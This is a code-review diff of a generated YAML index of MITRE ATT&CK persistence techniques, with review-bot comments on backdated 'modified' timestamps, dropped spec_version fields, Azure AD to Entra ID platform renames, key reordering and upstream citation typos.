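Review bot: the new T1098.007 block (from `T1098.007:` down to its `atomic_tests: []`) is added with `x_mitre_detection: ''` and no atomic tests, and its kill_chain_phases list both `persistence` and `privilege-escalation`, so the identical entry must also appear under the privilege-escalation section of this file or the two tactic views will disagree; please confirm the generator emitted it there as well. Two smaller items in the reshuffled T1137.005 block above it: the detection text still reads `PRPR_RULE_MSG_NAME` next to `PR_RULE_MSG_PROVIDER` (the MAPI property is `PR_RULE_MSG_NAME`; this is an upstream ATT&CK typo, so report it there rather than hand-patching generated YAML), and `x_mitre_permissions_required` (Administrator, User) is dropped while `x_mitre_platforms` gains `Office Suite` and `x_mitre_version` moves from 1.1 to 1.2. Everything else in that block (description, detection text, data sources, the five external_references) is a key reorder with identical values, which is why the hunk looks far larger than the substantive change.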
@@ -29781,7 +30215,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
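Review bot: `modified` moves backwards here, from `'2022-04-25T14:00:00.188Z'` to `'2020-11-10T18:29:31.094Z'`, and the same regression recurs in most later hunks of this patch (T1037.002, T1205, T1525, T1547.005, T1546.005, T1574.006, T1546.012, T1574.005, T1546.008, T1542.002, T1543.004). The old values all share the `14:00:00.188Z` / `14:49:39.188Z` pattern, which looks like a stamp applied by the previous export rather than an upstream value, while the new ones look like genuine STIX `modified` timestamps. If that is the reason, state it in the PR description, and check that nothing downstream treats a newer `modified` as "technique changed", because every one of these objects will now appear to move into the past.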
@@ -29836,13 +30270,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
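Review bot: for T1546.011 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted with no replacement, whereas T1547.010 in the same hunk keeps `x_mitre_attack_spec_version: 3.2.0`, T1037.002 and T1205 later keep their `2.1.0` line, and T1574.008 gets a new `3.2.0` line. Please confirm T1546.011 (and T1525, T1547.005, T1546.005, T1546.012 and T1574.005, which receive the same two-line deletion) still carries `x_mitre_attack_spec_version` elsewhere in the object; if not, the generator is dropping it only where it happened to sit next to `spec_version`. Removing `spec_version` itself is fine for this YAML, but it is a required common property on every STIX 2.1 object, so whatever re-serialises these records into STIX bundles must add it back.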
@@ -29903,9 +30335,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29914,7 +30346,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29967,7 +30398,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -29988,12 +30419,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30077,11 +30507,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30094,7 +30523,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -30107,7 +30535,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -30137,7 +30564,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -30169,7 +30597,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30191,8 +30619,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30218,7 +30644,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30244,36 +30670,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
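Review bot: the Azure AD to Entra ID rename is applied to prose only, which is correct: the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` keys are left alone because each must match a `source_name` in `external_references`, and the literal `AzureADConnectAuthenticationAgentService` process name is left alone because that is what the service is actually called. `Read Teamers` in the second key looks like a typo for `Red Teamers`, but since it is a citation key it has to be fixed upstream in ATT&CK (key and source_name together), not in this generated file.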
@@ -30281,9 +30705,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30292,21 +30716,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
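Review bot: the substantive change in this hunk is the platform list plus the version bump (`Azure AD`, `Google Workspace` and `Office 365` removed; `Office Suite` and `Identity Provider` added; `x_mitre_version` 1.0 to 1.1); the added `x_mitre_attack_spec_version: 3.2.0`, `x_mitre_contributors: - Praetorian`, `x_mitre_deprecated: false`, `x_mitre_domains` and `x_mitre_modified_by_ref` lines carry the same values that the `-` lines beneath them remove, so that part is a key reorder. Two follow-ups: any per-platform index derived from `x_mitre_platforms` must be regenerated, because this object (and T1078.001 later in the patch, which gets the same substitution) no longer matches `Azure AD`, `Office 365` or `Google Workspace` at all; and if the generator emitted x_mitre_* keys in a stable order, these reorders would stop swamping the diffs that matter.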
@@ -30346,13 +30771,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30429,12 +30851,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30453,6 +30874,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30460,7 +30882,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30480,29 +30901,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
@@ -30579,12 +31002,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30599,6 +31021,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30607,18 +31030,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -30650,9 +31073,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30724,7 +31144,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30751,7 +31170,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -30777,13 +31196,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -30904,7 +31321,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30976,7 +31392,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -31046,7 +31461,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -31156,7 +31570,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -31210,7 +31623,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31243,8 +31656,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -31275,7 +31686,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
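Review bot: not introduced by this hunk but visible in its context lines: the Stefan Kanthak reference for T1574.005 is dated `2015, December 8` yet records `Retrieved December 4, 2014`, which cannot both be right. It is upstream ATT&CK data, so leave the generated line as it is and report it there rather than editing it locally.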
@@ -31310,12 +31721,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31392,7 +31801,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31446,7 +31854,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31478,7 +31885,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31508,55 +31915,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.001
- url: https://attack.mitre.org/techniques/T1137/001
- - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
- description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
- Retrieved July 3, 2017.
- source_name: Microsoft Change Normal Template
- - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
- description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
- Retrieved July 3, 2017.
- source_name: MSDN VBA in Office
- - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
- description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
- Retrieved July 3, 2017.
- source_name: enigma0x3 normal.dotm
- - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
- description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
- Retrieved July 3, 2017.
- source_name: Hexacorn Office Template Macros
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- - source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
- description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
- Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:01:35.918Z'
name: 'Office Application Startup: Office Template Macros.'
description: "Adversaries may abuse Microsoft Office templates to obtain persistence
on a compromised system. Microsoft Office contains templates that are part
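Review bot: most of this hunk is key reordering rather than content. The `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` blocks removed here reappear at the end of the same T1137.001 object further down, with the reference entries shuffled (`url` and `external_id` swapped, list order changed). The substantive changes, the `modified` date moving to 2024-10-15 and the fields that follow it, are hard to pick out of roughly 45 removed lines; emitting the YAML with a stable key order (sorted keys, or the order the previous index used) would keep regenerated diffs reviewable.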
@@ -31587,6 +31949,7 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: 'Many Office-related persistence mechanisms require changes
to the Registry and for binaries, files, or scripts to be written to disk
or existing files modified to include malicious scripts. Collect events related
@@ -31596,9 +31959,13 @@ persistence:
also be investigated since the base templates should likely not contain VBA
macros. Changes to the Office macro security settings should also be investigated.(Citation:
GlobalDotName Jun 2019)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
